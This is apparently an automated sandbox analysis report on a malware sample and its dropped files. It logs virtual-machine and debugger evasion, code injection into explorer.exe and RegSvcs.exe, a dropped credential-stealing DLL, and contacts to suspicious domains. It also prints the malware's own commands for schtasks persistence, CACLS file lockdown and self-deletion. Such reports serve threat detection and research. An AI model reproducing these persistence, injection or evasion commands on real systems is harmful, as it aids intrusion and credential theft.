Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Opens the same file many times (likely Sandbox evasion)

Source: C:\Users\user\AppData\Local\Temp\B4A7.exe

File opened: C:\Users\user\AppData\Local\Temp\0.txt count: 74828

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cttgcew	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cttgcew	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cttgcew	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cttgcew	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cttgcew	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\cttgcew	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\F771.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 1332	Thread sleep count: 650 > 30
Source: C:\Windows\explorer.exe TID: 1280	Thread sleep count: 1292 > 30
Source: C:\Windows\explorer.exe TID: 1280	Thread sleep time: -129200s >= -30000s
Source: C:\Windows\explorer.exe TID: 2148	Thread sleep count: 1201 > 30
Source: C:\Windows\explorer.exe TID: 2148	Thread sleep time: -120100s >= -30000s
Source: C:\Windows\explorer.exe TID: 1504	Thread sleep count: 490 > 30
Source: C:\Windows\explorer.exe TID: 5984	Thread sleep count: 1081 > 30
Source: C:\Windows\explorer.exe TID: 5984	Thread sleep time: -108100s >= -30000s
Source: C:\Windows\explorer.exe TID: 2888	Thread sleep count: 1163 > 30
Source: C:\Windows\explorer.exe TID: 2888	Thread sleep time: -116300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 4884	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 4884	Thread sleep time: -1020000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 2400	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 3272	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 5724	Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\CF35.exe TID: 5388	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\CF35.exe TID: 5388	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\E35A.exe TID: 1652	Thread sleep count: 106 > 30
Source: C:\Users\user\AppData\Local\Temp\E35A.exe TID: 1652	Thread sleep count: 284 > 30
Source: C:\Users\user\AppData\Local\Temp\F771.exe TID: 5244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5684	Thread sleep count: 96 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5684	Thread sleep time: -96000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5692	Thread sleep count: 77 > 30
Source: C:\Windows\explorer.exe TID: 5692	Thread sleep time: -77000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5852	Thread sleep count: 92 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5852	Thread sleep time: -92000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5844	Thread sleep count: 72 > 30
Source: C:\Windows\explorer.exe TID: 5844	Thread sleep time: -72000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5092	Thread sleep count: 1073 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5092	Thread sleep time: -643800000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5092	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 244	Thread sleep count: 129 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 244	Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3968	Thread sleep count: 128 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3968	Thread sleep time: -128000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4936	Thread sleep count: 127 > 30
Source: C:\Windows\explorer.exe TID: 4936	Thread sleep time: -127000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5236	Thread sleep count: 125 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5236	Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5344	Thread sleep count: 44 > 30

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 650
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1292
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1201
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 490
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1081
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1163
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 1073

Source: C:\Users\user\AppData\Local\Temp\A852.exe

API coverage: 5.5 %

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\EB2B.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000

Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: explorer.exe, 00000001.00000000.281683867.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: rovwer.exe, 0000000E.00000002.802911113.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWy
Source: rovwer.exe, 0000000E.00000003.603268996.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.281683867.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.333291394.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.281683867.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000001.00000000.338055821.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000001.00000000.269344500.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000001.00000000.338055821.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: RegSvcs.exe, 0000002F.00000002.635321325.000002ADBFFE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\q4Z52wRd28.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00405400 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00420B76 FindFirstFileExW,

Source: C:\Users\user\Desktop\q4Z52wRd28.exe

System information queried: ModuleInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\cttgcew	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00860D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0086092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_0041B8D1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_0041DED2 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\cttgcew	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_0041CA50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_004037D0 DeleteObject,GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,

Source: C:\Users\user\AppData\Local\Temp\F771.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00418133 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_0041CA50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00418A37 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00418B9C SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: cdn-102.anonfiles.com
Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe	Domain query: github.com
Source: C:\Windows\explorer.exe	Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe	Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe	Domain query: anonfiles.com
Source: C:\Windows\explorer.exe	Domain query: hoteldostyk.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.3 80
Source: C:\Windows\explorer.exe	Domain query: iplogger.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.56.146.174 80
Source: C:\Windows\explorer.exe	Domain query: srshf.com
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: 1ecosolution.it
Source: C:\Windows\explorer.exe	Network Connect: 193.56.146.168 80

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: E35A.exe.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\cttgcew	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\cttgcew	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Memory written: C:\Users\user\AppData\Local\Temp\EB2B.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00403F40 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Thread created: C:\Windows\explorer.exe EIP: 3851A28
Source: C:\Users\user\AppData\Roaming\cttgcew	Thread created: unknown EIP: 58E1A28

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 83E008
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 91A000
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: BEA000
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: FD28B52010

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 5644 base: 103F380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5656 base: 7FF69FF38150 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5816 base: 103F380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5876 base: 7FF69FF38150 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5068 base: 103F380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 3932 base: 103F380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 408 base: 103F380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 4972 base: 7FF69FF38150 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5248 base: 103F380 value: 90

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\CF35.exe

Thread register set: target process: 5128

Source: C:\Users\user\AppData\Local\Temp\A852.exe	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00404350 ShellExecuteA,CreateToolhelp32Snapshot,

Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268529743.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.326594831.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.338421069.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.306181277.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268529743.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.326594831.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.268292712.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.325898448.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.300435506.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
